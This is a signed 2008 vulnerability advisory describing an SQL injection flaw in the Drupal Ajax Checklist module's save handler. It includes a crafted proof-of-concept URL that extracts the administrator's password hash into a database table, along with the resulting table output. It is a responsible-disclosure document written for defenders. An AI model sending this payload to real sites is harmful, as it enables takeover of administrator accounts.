-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Drupal Ajax Checklist Module SQL Injection Vulnerability
* Discovery Date: Sept 15, 2008
* Security risk: high
* Exploitable from: Remote
* Vulnerability: SQL Injection
* Discovered by: Justin C. Klein Keane <justin_at_madirish.net>
Description
Drupal (http://drupal.org) is a robust content management system (CMS)
that provides extensibility through hundreds of third party modules.
While the security of Drupal core modules is vetted by a central
security team, third party modules are not reviewed for security.
The Ajax Checklist module (http://drupal.org/project/ajax_checklist),
created by AsciiKewl (http://drupal.org/user/147292) is designed to
allow users to input dynamic checklists into nodes. These checklists can
then be checked or unchecked with state tracked via AJAX calls to pages
that store the state in the database. Due to poor input validation on
the AJAX handling pages, this module is vulnerable to SQL injection
attacks. Depending on configuration, these attacks could be carried out
by remote unauthenticated users. Due to it's data driven design, SQL
injection attacks pose a critical threat to Drupal installations and
their hosts and could lead to full control over the webserver process.
The critical flaw exists within the ajax_checklist_save() function
(lines 61-84 of ajax_checklist.module). This function accepts three
parameters ($nid,$qid, and $state), all of which can be manipulated via
a properly crafted URL. These parameters are then used to craft SQL
select, insert, and update statements without first being sanitized.
Vulnerable Versions
5.x-1.0 dated 1007-Aug-18 was tested and shown vulnerable
Testing for Vulnerability
Calling the URL:
http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4
will cause the administrator password to be inserted into the
ajax_checkbox table in the Drupal database:
mysql> select * from ajax_checklist;
+-----+------+----------------------------------+-------+
| nid | user | qid | state |
+-----+------+----------------------------------+-------+
| 1 | 0 | 2 | 2 |
| 3 | 3 | 4202b5f87a68583e20aae6917c8c33d1 | 3 |
| 4 | 4 | 4 | 3 |
+-----+------+----------------------------------+-------+
Impact
Highly critical. Depending on configuration, this vulnerability could
allow attackers to compromise the Drupal administrator account, an
attack that can lead to web server and even host compromise since the
administrator can configure file uploads and alter any content on the
Drupal installation.
Determining Version
The ajax_checklist.info page for vulnerable versions displays the
following information:
; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $
name = Ajax Checklist
description = Creates filter-driven checklists with ajax updating to the
database
package = Other
version = 5.x-0.1
; Information added by drupal.org packaging script on 2007-08-18
version = "5.x-1.0"
project = "ajax_checklist"
datestamp = "1187416501"
Determining version information on Drupal sites is trivial in many cases
(ref http://www.madirish.net/?article=214).
Vendor Response
Drupal security team contacted September 17, 2008. A security patch and
announcement should be available Wednesday September 24, 2008.
- --
Justin C. Klein Keane
http://www.MadIrish.net
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iPwEAQECAAYFAkjakiMACgkQkSlsbLsN1gAHqgb8Cn+KHQOHCJqZXhtd1Nuhhjjl
aE2q0njdi9KX+zjNKPEqXhvY6BJNkj6ql0rea7acsxW3d+/0+eDlMQ1Y76nCznOk
zBk1KU/6XymZ2xtvkxpxpAE1gaVbVtjeijuqAYkonQps8qdm6ZSV5UQpadjcxyFW
4UXmhXa0lithie8nR8P7Hej6BiqeGMQLr+kHPFK0JdvtfW6sFziXXbzNzGNgTjFV
51S/qbb8K5q1EwMs23JXHu5tFWEZWmgFBPn8dva+uxYQDxO80nSovuh+itqzO9jz
8pCjulvjPEO8xg8PE4Q=
=/d0S
-----END PGP SIGNATURE-----